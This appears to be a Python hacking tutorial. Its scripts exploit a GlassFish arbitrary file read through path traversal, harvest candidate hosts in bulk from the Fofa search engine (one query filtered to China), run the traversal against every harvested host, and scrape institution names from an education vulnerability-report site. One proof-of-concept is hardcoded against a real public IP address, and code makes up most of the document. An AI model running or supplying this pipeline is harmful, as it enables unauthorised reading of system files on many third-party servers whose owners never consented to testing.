77: Python Development - Batch Fofa Search, POC Verification & SRC Extraction

Topics covered in this lesson:
  • requests-based crawling, data extraction with lxml, exception handling, and how to use Fofa (a minimal primer sketch follows below)
Learning objective:
  • Learn to write scripts that collect targets in bulk and verify them against public or 0day vulnerabilities
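Before the cases, here is a minimal primer that strings the three techniques together (requests for fetching, lxml/XPath for extraction, try/except for error handling). The URL and XPath are placeholders for illustration only:

import requests
from lxml import etree  # install first: python3 -m pip install lxml

def fetch_links(url):
    try:
        # fetch the page; the timeout keeps a dead host from hanging the script
        html = requests.get(url, timeout=5).content
        tree = etree.HTML(html)
        # placeholder XPath: the href of every <a> tag on the page
        return tree.xpath('//a/@href')
    except Exception as e:
        print("request failed: " + str(e))
        return []

if __name__ == '__main__':
    print(fetch_links("https://example.com"))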

Case 1: POC verification script for a vulnerability

Vulnerability background: older GlassFish builds (around 4.1) have an arbitrary file read flaw - each %c0%ae is an overlong UTF-8 encoding of ".", so %c0%ae%c0%ae/ behaves like "../" and the traversal under /theme/META-INF/ walks out of the web root to read files such as /etc/passwd (Linux) or Windows/win.ini (Windows).
Verification script:
# Author:Zhengna

import requests

def glassfish_vcheck(url):

    payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini"

    data_linux = requests.get(url+payload_linux) # response for the Linux payload
    data_windows = requests.get(url+payload_windows) # response for the Windows payload

    statuscode_linux = data_linux.status_code    # HTTP status code of the Linux payload request
    statuscode_windows = data_windows.status_code   # HTTP status code of the Windows payload request

    if statuscode_linux == 200:
        print("GlassFish arbitrary file read vulnerability exists (Linux)")
        print(data_linux.text)
    elif statuscode_windows == 200:
        print("GlassFish arbitrary file read vulnerability exists (Windows)")
        print(data_windows.text)
    else:
        print("GlassFish arbitrary file read vulnerability does not exist")

if __name__ == '__main__':
    # You can go to the Fofa site and search app="glassfish" && port="4848" to find potentially vulnerable sites.
    url = "http://3.0.49.154:4848"
    glassfish_vcheck(url)

    # For connection errors, see this workaround: https://blog.csdn.net/a1007720052/article/details/83383220
GlassFish arbitrary file read vulnerability POC
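Note that a 200 status by itself can be a false positive, since some servers answer 200 with a custom error page. Below is a minimal sketch of a stricter check that also inspects the response body and adds a timeout; glassfish_vcheck_strict is a hypothetical name, not part of the original script:

import requests

def glassfish_vcheck_strict(url):
    payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    try:
        r = requests.get(url + payload_linux, timeout=5)
        # /etc/passwd always contains "root:" on Linux, so require it in the body
        if r.status_code == 200 and "root:" in r.text:
            print(url + " is vulnerable (Linux target)")
            return True
    except requests.RequestException as e:
        print(url + " request failed: " + str(e))
    # the Windows payload can be checked the same way, e.g. looking for typical win.ini content
    return False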

Case 2: Batch collection script for Fofa search results

1. Manual collection
  • Go to the Fofa site (https://fofa.so/) and search "glassfish" && port="4848" to find potentially vulnerable sites.
2. Batch collection
# Author:Serena
import requests,base64,time
from lxml import etree # install the lxml module first: python3 -m pip install lxml

'''
How to batch this vulnerability check:
    1. Collect addresses that may be vulnerable - use Fofa to gather targets
        1.1 Filter the data returned by the request
    2. Request each address and check whether the vulnerability exists - single-threaded or multi-threaded
'''
# Without a paid account, only the first 10 results can be collected
def ip_collect():
    url = "https://fofa.so/result?qbase64="
    search_data = '"glassfish" && port="4848" && country="CN" '
    # search_data = '"glassfish" && port="4848" '
    search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
    urls = url+search_data_b64
    result = requests.get(urls).content
    soup = etree.HTML(result)
    ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href')
    ip_data = set(ip_data) # remove duplicate IPs
    # print(ip_data)
    ipdata = '\n'.join(ip_data)
    with open(r'ip-10.txt','a+') as f:
        f.write(ipdata+'\n')

# With a paid (VIP) account, many more results can be collected
def ip_collect_vip():
    search_data = '"glassfish" && port="4848"'
    search_data_b64 = base64.b64encode(search_data.encode("utf-8")).decode("utf-8")
    headers = {
        'cookie':'_fofapro_ars_session=aaaaaaaaaaaaaaaaaaaaaaaaa'
    }
    for pageNumber in range(1,11):
        urls = "https://fofa.so/result?page="+str(pageNumber)+"&qbase64="+search_data_b64
        print('Extracting page ' + str(pageNumber))
        try:
            result = requests.get(urls,headers=headers,timeout=0.5).content
            soup = etree.HTML(result)
            ip_data = soup.xpath('//span[@class = "aSpan"]/a[@target="_blank"]/@href')
            ip_data = set(ip_data)  # remove duplicate IPs
            print(ip_data)
            ipdata = '\n'.join(ip_data)
            with open(r'ip-200.txt','a+') as f:
                f.write(ipdata+'\n')
        except Exception as e:
            pass

if __name__ == '__main__':
    ip_collect()
    # ip_collect_vip()
Fofa batch extraction
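Scraping the HTML result page is fragile: the page layout and the aSpan class can change at any time. Fofa also offers a JSON search API keyed to an email/API-key pair; the endpoint and field names below follow the commonly documented /api/v1/search/all interface and should be treated as assumptions to verify against the current Fofa API docs:

import base64, requests

def ip_collect_api(email, key, query, size=100):
    qbase64 = base64.b64encode(query.encode("utf-8")).decode("utf-8")
    # assumed endpoint and parameters; verify against the official Fofa API documentation
    api = "https://fofa.so/api/v1/search/all"
    params = {"email": email, "key": key, "qbase64": qbase64, "size": size, "fields": "host"}
    data = requests.get(api, params=params, timeout=10).json()
    hosts = set()
    for item in data.get("results", []):
        # results may be plain strings (single field) or lists (multiple fields)
        hosts.add(item if isinstance(item, str) else item[0])
    with open(r'ip-api.txt', 'a+') as f:
        f.write('\n'.join(hosts) + '\n')

if __name__ == '__main__':
    ip_collect_api("you@example.com", "your_api_key", '"glassfish" && port="4848"')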

Case 3: Batch POC verification script for the vulnerability

# Author:Zhengna
import time
import requests


def glassfish_vcheck():

    payload_linux = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    payload_windows = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/Windows/win.ini"

    for url in open('ip-10.txt'):
        url = url.replace('\n', '')
        print("check->" + url)
        try:
            data_linux = requests.get(url + payload_linux, timeout=5)  # response for the Linux payload
            data_windows = requests.get(url + payload_windows, timeout=5)  # response for the Windows payload

            statuscode_linux = data_linux.status_code  # HTTP status code of the Linux payload request
            statuscode_windows = data_windows.status_code  # HTTP status code of the Windows payload request

            with open(r'vuln.txt', 'a+', encoding='utf8') as f:
                if statuscode_linux == 200:
                    f.write("-----------------------------------------------\n")
                    f.write(url + " has the GlassFish arbitrary file read vulnerability\n")
                    f.write(url + " is a Linux host\n")
                    # f.write(data_linux.text)
                elif statuscode_windows == 200:
                    f.write("-----------------------------------------------\n")
                    f.write(url + " has the GlassFish arbitrary file read vulnerability\n")
                    f.write(url + " is a Windows host\n")
                    # f.write(data_windows.text)
                else:
                    f.write("-----------------------------------------------\n")
                    f.write(url + " does not have the GlassFish arbitrary file read vulnerability\n")
            time.sleep(0.5)
        except Exception as e:
            # skip hosts that cannot be reached instead of aborting the whole batch
            pass

if __name__ == '__main__':
    glassfish_vcheck()
Batch verification POC for the GlassFish arbitrary file read vulnerability
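The comment block in Case 2 mentions a multi-threaded option, while the check above is single-threaded and waits on each host in turn. Here is a sketch of a threaded variant using concurrent.futures; check_one and the worker count are illustrative choices, not part of the original script:

import requests
from concurrent.futures import ThreadPoolExecutor

PAYLOAD = "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"

def check_one(url):
    try:
        r = requests.get(url + PAYLOAD, timeout=5)
        if r.status_code == 200:
            return url
    except requests.RequestException:
        pass  # unreachable host: treat as not vulnerable
    return None

def batch_check():
    urls = [line.strip() for line in open('ip-10.txt') if line.strip()]
    # 10 worker threads; the requests are I/O-bound, so threads overlap the waiting time
    with ThreadPoolExecutor(max_workers=10) as pool:
        for result in pool.map(check_one, urls):
            if result:
                with open('vuln.txt', 'a+', encoding='utf8') as f:
                    f.write(result + " has the GlassFish arbitrary file read vulnerability\n")

if __name__ == '__main__':
    batch_check()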

Case 4: Batch extraction script for the education SRC report platform

Education-sector vulnerability report platform (Beta): https://src.sjtu.edu.cn/
# Author:zhengna
import requests,time
from lxml import etree

def src_collect(page):
    try:
        for i in range(1,int(page)+1):
            url = "https://src.sjtu.edu.cn/list/?page="+str(i)
            print("正在提取第"+str(i)+"")
            r = requests.get(url).content
            soup = etree.HTML(r)
            result = soup.xpath('//td[@class=""]/a/text()')
            results = '\n'.join(result)
            resultss = results.split()
            for edu in resultss:
                with open(r'src-edu.txt','a+',encoding='utf-8') as f:
                    f.write(edu + '\n')
    except Exception as e:
        time.sleep(0.5)
        pass

if __name__ == '__main__':
    page = input("How many pages do you want to extract? -->")
    src_collect(page)
src_collect

 
